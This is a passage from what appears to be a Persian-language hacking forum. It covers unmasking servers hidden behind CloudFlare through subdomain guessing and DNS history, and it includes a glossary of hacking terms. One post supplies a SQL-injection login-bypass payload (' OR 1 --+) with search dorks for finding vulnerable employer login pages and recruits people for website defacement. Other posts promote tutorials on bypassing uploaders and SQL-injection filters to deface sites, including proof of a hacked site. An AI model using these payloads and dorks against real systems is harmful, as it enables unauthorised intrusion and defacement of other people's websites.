21)، SSH (پورت22)، cPanel (پورت 2082) و غیره جواب نمیدن. یک سوال؟ اگر CloudFlare به این درخواست های من جواب نمیده پس چطور مدیر وبسایت به سرور میتونه وصل بشه؟ این جوابی هست که خود CloudFlare داده: راه حل اینه که به سادگی یک رکورد DNS بسازید مثل direct.example.com که بتونید ارتباط مستقیمی به سرور داشته باشید. (مدیرانی که آی پی سرور براشون مهم هست و ممکنه اتصال مستقیمشون به سرور از طریق شبکه ردیابی بشه، این ارتباط رو با پراکسی های دیگه انجام میدن چونکه اگر بدون ملاحظه مسایل امنیتی بخوان مستقیم به سرور وصل بشن ممکنه توی شبکه ی LAN دیده بشه و آی پی لو بره) حمله: حالا فرض کنید که قصد حمله داریم. اگر آدرس example.com رو پینگ کنیم متوجه میشیم که ویژگی حفاظت توسط CloudFlare فعال شده و به این معنی هست که example.com و www.example.com هر دوشون یه ای پی دارن که اونم متعلق به CloudFlare هست. با استفاده از توضیحاتی که بعنوان پس زمینه دادم، میدونید که مدیر کل وبسایت احتمالا زیردامنه های دیگه ای که بطور مستقیم به سرور اصلی متصل میشن و توسط CloudFlare محافظت نمیشن رو ایجاد کرده. خب به راحتی میتونید حدس بزنید این آدرس ها چی هستند و بعدش اونها رو پینگ کنید. بعضی از زیردامنه های عمومی و مشهور mail ، ftp ، ssh ، direct هستند. مثلا webmail.example.com mail.example.com ftp.example.com ssh.example.com direct.example.com باز هم میگم که این روش توسط همه ی Resolver ها (Cloudflare IP resolvers/scripts) مورد استفاده قرار میگیره. برای نمونه اینجا کلیک کنید. (توی این لینک آدرس وبسایتی که میخواد رو وارد کنید و روی Search DNS کلیک کنید. میبینید که این سایت با استفاده از روشی که گفتم DNS هایی که بنظرش ممکنه وجود داشته باشه رو جستجو میکنه و اگر وجود داشته باشن، آی پی شون رو جلوشون مینویسه. همچنین در پایین صفحه به شما میگه که آیا وبسایت توسط CloudFlare تحت محافظت هست یا نه. آی پی CloudFlare هم نشونتون میده) ضد حمله: انجام عملیات های DNS Resolution بر روی وب سایت های محافظت شده توسط CloudFlare یک نوع حمله ی رایج در بین حمله کنندگان هست که اکثر ادمین های محتاط سعی میکنند مواظب زیردامنه های معمول و قابل حمله باشند. اگر شما بعنوان ادمین وبسایت قصد دارید که بدون وجود زیردامنه به سرور اصلی خود متصل شوید، هم می توانید یه دامنه ی کاملا جداگانه ایجاد کنید (مثلا connect.example2.com) و یا اینکه در محیطی امن بصورت مستقیم به سرور خود وصل شوید. *** 2- تاریخچه DNS/Hosting پس زمینه: اگر شما بعنوان ادمین در حال فعال سازی سرویس CloudFlare برای وب خود هستید (example.com)، این رو باید در نظر بگیرید که وب شما از اول کار در دسترس بوده و یه آی پی عمومی هم داشته (111.111.111.111) اگر یک وبسایت برای مدتی (تقریباً یک ماه) بر روی یک آی پی یکسان هاست شده باشه، امکان داره که یه خزنده ی وب (Web Crawler) بهش دسترسی پیدا کرده باشه. خیلی از این خزنده ها جزئیات وبسایت رو بصورت گزارش ذخیره می کنند و ارائه میدن. حمله: حمله کننده میتونه به راحتی تاریخچه ی هاستینگ وبسایت رو توی دیتابیس های مختلف جستجو کنه (LOOK UP) و بفهمه که قبل از راه اندازی سرویس CloudFlare، آی پی سرور اصلی چی بوده. توی تاپیک زیر دو سرویس رایگان برای همچنین حمله ای معرفی کردم: ضد حمله: خوشبختانه حل این معضل امنیتی هم ساده س. اگر دارید وبسایتی رو راه اندازی میکنید و میخواد که آی پی سرور اصلی خودتون رو مخفی نگه دارید، حتماً قبل از اینکه دامنه رو به هاست متصل کنید، سرویس CloudFlare رو تنظیم و فعال کنید. اگر هم آی پی سرور اصلی شما قبلا جایی در دسترس بوده و گزارشی ازش وجود داره، بهترین کار تعویض آی پی هست. اون قدر ها هم سخت نیست که یه آی پی جدید برای هاستتون گیر بیارید. مطمئن بشید که آی پی قدیمی به سرور شما وصل نمیشه
  21. proxy

    اصطلاحات هک

    معنی هک: هک به معنی سود بردن از یک روش سریع و هوشمندانه برای حل یک مشکل در رایانه می‌باشد. در علوم مربوط به رایانه معنی هک گاه مساوی معنی کرک (crack) که رمزگشایی است نیز عنوان می‌شود. در گفتگوهای امروزی هک به معنی نفوذ به یک سیستم رایانه‌ای است؛ و کرک نیز به معنی رمزگشایی است و کراکر (به انگلیسی: Cracker) به فرد گشاینده رمز می‌گویند. باگ چیست؟ باگ نوعی خطا یا اشتباه در اجرای نرم افزار است که موجب نتایج اشتباه یا اجرا نشدن نرم افزار می‌شود. علت این اشکالات می‌تواند اشتباه در هنگام برنامه نویسی باشد. شرکت های سازنده نرم فزارها برای حل این مشکل قبل از ارائه نسخه نهایی نسخه‌هایی تحت نام بتا یا آلفا انتشار می‌دهند تا افرادی آنها را بررسی کنند و این باگ‌ها را گزارش کنند. و هکر میتواند با استفاده از باگ به نرمافزار نفوذ کرده و به هدف خود برسد. شل چیست؟ شل یک ابزار برنامه نویسی شده است که هکر با آپلود کردن اون روی سایت می تواند کارهای مورد نظر خودش رو مانند حذف یا دانلود فایلها و خواندن اطلاعات دیتابیس یا ... رو انجام دهد سی ام اس چیست؟ سی ام اس یا cms سیستم مدیریت محتوا مانند جوملا و وردپرس و..... پورت چیست؟ به راه های ورودی و خروجی اطاعات در سیستم پورت گفته میشه که مانند درهای یک خونه هستند اکسپلویت چیست؟ زمانی که هکر یک باگ رو کشف میکنه برای اینکه بتواند دفعه بعد با سرعت بیشتری نفوذ رو انجام بدهد یک کد مینویسد که عمل نفوذ رو انجام دهد که به آن اکسپلویت گفته می شود. آی پی چیست؟ به آدرس یک سیستم در بستر اینترنت یا شبکه آی پی ip گفته میشود دفیس و مس دفیس چیست؟ زمانی که صفحه سایت مورد نفوذ تغیر پیدا کرد در اصطلاح میگویند که سایت دفیس شده است حال اگر صفحه چند سایت با آی پی های یکسان تغییر پیدا کند میگویند که مس دفیس اتفاق افتاده است بایپس چیست؟ به عبور کردن از موانع بایپس میگویند مانند وقتی به سایتی نفوذ می کنید که safe mode آن فعال هست برای اجرا کردن دستورات خود بر روی شل به مشکل بر می خورید و دلیل آن هم وجود firewall سرور هست . برای اینکه بتوانید دستورات خود را بر روی شل اجرا کنید ولی firewall گیر ندهد باید آن را bypass (دور زدن firewall ) کنید . اگه چیزی رو از قلم انداختم بگید فقط دوستان لطف کنید به چت روم تبدیل نکنید اینجا رو ممنون
  22. proxy

    بایپس پیج ادمین

    سلام یک بایپس دیدم گفتم بزارم دوستان هم استفاده کنن برای دوستان مبتدی فیلم هم قرار دادم user:' OR 1 --+ password:' OR 1 --+ dork:inurl:emplogin.php intext:"Employer's Login" dork:inurl:login.php intext:"Employer's Login" امیدوارم مفید باشه دوستانی که به دفیس علاقه دارن بهم پیام بدن bypass.rar
  23. درود ../ با آموزش بایپس انواع آپلودر در خدمتتون هستیم در این روش ما دیفیس پیج خودمون رو به سادگی آپلود میکنیم خیلی از سرویس دهندگان آپلودر این باگ رو دارن باگ توسط اعضای تیم امنیتی گارد ایران کشف شده (MR.IMAN , Reza.Attacker , 1TED) کلیپ در دو پارت تقسیم بندی شده رمز فایل فشرده: guardiran.org لینک اثبات یکی از سایت های هک شده با این روش [Hidden Content] یا حـ ـق ../ 22-07-2016 01-21-51 ب-ظ.part1.rar 22-07-2016 01-21-51 ب-ظ.part2.rar
  24. در این تاپیک بایپس های باگ محبوب sql injection رو مطرح می کنیم. لطفا سوالات رو در بخش سوال و جواب مطرح کنید. قبل از قرار دادن آموزش با بنده هماهنگ کنید. تاپیک با مدیر عزیز C0d3!Nj3ct!0N هماهنگ شده
  25. درود در این قسمت آموزش بایپس bypass در باگ Sql Injection رو براتون اماده کردم . پیشنهاد میکنم این تاپیک رو هم ببینید : تاپیک جامع نفوذ به سایت +فیلم های آموزشی همونطور که می دونید باگ Sql Injection دارای بایپس های زیادی داره و در این فیلم آموزشی هم یکی از آموزشهای خوبشو به شما یاد میدم . یکی از بهترین Bypass های باگ Sql Injection بایپس Union Select هست و توضیحات کامل هست و با دیدن فیلم خیلی از مشکلات شما برای تارگتهای دیگه برطرف میشه . پسورد : guardiran.org موفق باشید bupass2.rar
×
×
  • ایجاد مورد جدید...